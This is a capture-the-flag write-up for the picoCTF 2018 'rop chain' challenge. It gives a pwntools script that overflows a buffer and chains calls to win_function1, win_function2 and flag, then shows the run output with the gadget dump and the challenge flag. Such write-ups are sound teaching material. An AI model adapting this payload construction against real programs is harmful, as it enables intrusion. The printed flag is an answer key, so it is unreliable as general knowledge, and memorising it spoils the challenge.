Rating:
The easy way is to use ROP module from pwntools.
**xpwn.py**
```py
#! /usr/bin/env python
from pwn import process, p32, u32, context, log
from pwn import ELF, ROP
context.clear(arch='i386', os='linux')
def main():
elf_name = '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
elf = ELF(elf_name)
offset_buf_to_eip = 0x18 + 4
p = process(elf_name)
rop_chain = ROP(elf)
rop_chain.win_function1()
rop_chain.win_function2(0xBAAAAAAD)
rop_chain.flag(0xDEADBAAD)
log.info(rop_chain.dump())
payload = 'A' * offset_buf_to_eip
payload += str(rop_chain)
assert('\n' not in payload)
p.sendlineafter('input> ', payload)
print(p.recv(4096))
if __name__ == "__main__":
main()
```
Run **xpwn.py** on pico shell server and we will finish this task:
```sh
zzzz@pico-2018-shell-2:~/pico18/pwn/rop$ py xpwn.py
[*] '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop': pid 1838022
[*] Loaded cached gadgets for '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
[*] 0x0000: 0x80485cb win_function1()
0x0004: 0x80485d8 win_function2(0xbaaaaaad)
0x0008: 0x804840d <adjust @0x10> pop ebx; ret
0x000c: 0xbaaaaaad arg0
0x0010: 0x804862b flag(0xdeadbaad)
0x0014: 'faaa' <return address>
0x0018: 0xdeadbaad arg0
picoCTF{rOp_aInT_5o_h4Rd_R1gHt_9853cfde}
```
